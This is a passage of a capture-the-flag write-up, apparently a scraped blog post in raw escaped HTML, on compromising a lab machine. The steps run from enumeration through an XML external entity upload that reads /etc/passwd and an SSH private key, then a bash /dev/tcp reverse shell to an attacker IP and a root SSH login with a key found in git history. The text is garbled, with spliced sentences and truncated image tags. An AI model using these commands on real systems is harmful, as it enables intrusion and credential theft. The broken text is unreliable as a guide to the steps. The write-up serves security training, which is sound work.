Let&#8217;s try the custom python enumeration script a friend of ours made:<br \/>\nhttps:\/\/github.com\/vishalb2308\/Pentest-Enumeration-Script\/blob\/master\/EnumScript.py<\/p>\n<p>The nmap part of the script indicates that:<br \/>\n<code>ports 22 and 5000 are open<br \/>\nssh is on 22 and supports publickey and password authentication<br \/>\nServer is Linux CPE OS, x86.<\/code><\/p>\n<p>dirb shows:<br \/>\n5000 is serving http for \/feed and \/upload<\/p>\n<p>ok going to 10.10.10.91:5000\/feed gives us an image with nothing much else.<br \/>\n<img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/Screenshot-from-2018-08-09-01-20-47.png\" alt=\"\" width=\"1920\" height=\"1080\" class=\"alignnone size-full wp-image-165\" srcset=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/Screenshot-from-2018-08-09-01-20-47.png 1920w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/Screenshot-from-2018-08-09-01-20-47-600x338.png 600w, gets us a page that says &#8220;send feed with XML&#8221; and allows us to upload &#8211; ok we will upload stuff \ud83d\ude42<\/p>\n<p>Googling for xml injection exploits gets us this page:<br \/>\n<a href=\"https:\/\/depthsecurity.com\/blog\/exploitation-xml-external-entity-xxe-injection\">https:\/\/depthsecurity.com\/blog\/exploitation-xml-external-entity-xxe-injection<\/a><\/p>\n<p>We get local file inclusion by uploading the following .xml script:<br \/>\n<img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/xml1.png\" alt=\"\" width=\"375\" height=\"177\" class=\"alignnone size-full wp-image-172\" srcset=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/xml1.png 375w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/10\/xml1-300x142.png 300w\" sizes=\"auto, (max-width: 375px) 100vw, 375px\" \/><\/p>\n<p>The interesting users found with this are:<br \/>\n<code>root:x:0:0:root:\/root:\/bin\/bash<br \/>\nroosa:x:1002:1002:,,,:\/home\/roosa:\/bin\/bash <\/code><\/p>\n<p>Let&#8217;s go ahead and get the user flag with this approach, so we upload the let&#8217;s work on getting the root flag:<\/strong><br \/>\nwe found this page about getting SSH credentials via LFI:<a href=\"https:\/\/digi.ninja\/blog\/when_all_you_can_do_is_read.php\">https:\/\/digi.ninja\/blog\/when_all_you_can_do_is_read.php<\/a><\/p>\n<p>Therefore, we use the following code to dump the ssh RSA key so we save that on our kali machine as id_rsa<br \/>\nwe then need to chmod the key:<br \/>\n<code>chmod 600 id_rsa<\/code><\/p>\n<p>and then log in with it:<br \/>\n<code>ssh roosa@10.10.10.91 -i id_rsa<\/code><\/p>\n<p>We do a reverse nc shell because it&#8217;s a bit slow on ssh for some reason:<br \/>\nwe run the following on kali: <code>nc -lvnp 7734<\/code><br \/>\nand this on the victim: <code>\/bin\/bash -i >& \/dev\/tcp\/10.10.14.5\/7734 0>&1<\/code><\/p>\n<p>we found a git directory here:<br \/>\n~\/work\/blogfeed\/<\/p>\n<p>so we run the following command:<br \/>\n<code>git log -p<\/code><br \/>\n<img loading=\"lazy\" decoding=\"async\" another SSH key that is different from Roosa&#8217;s<\/p>\n<p>we save this one as auth2.key<br \/>\nand we login to root with<br \/>\n<code>ssh root@10.10.10.91 -i auth2.key<\/code><\/p>\n<p>This
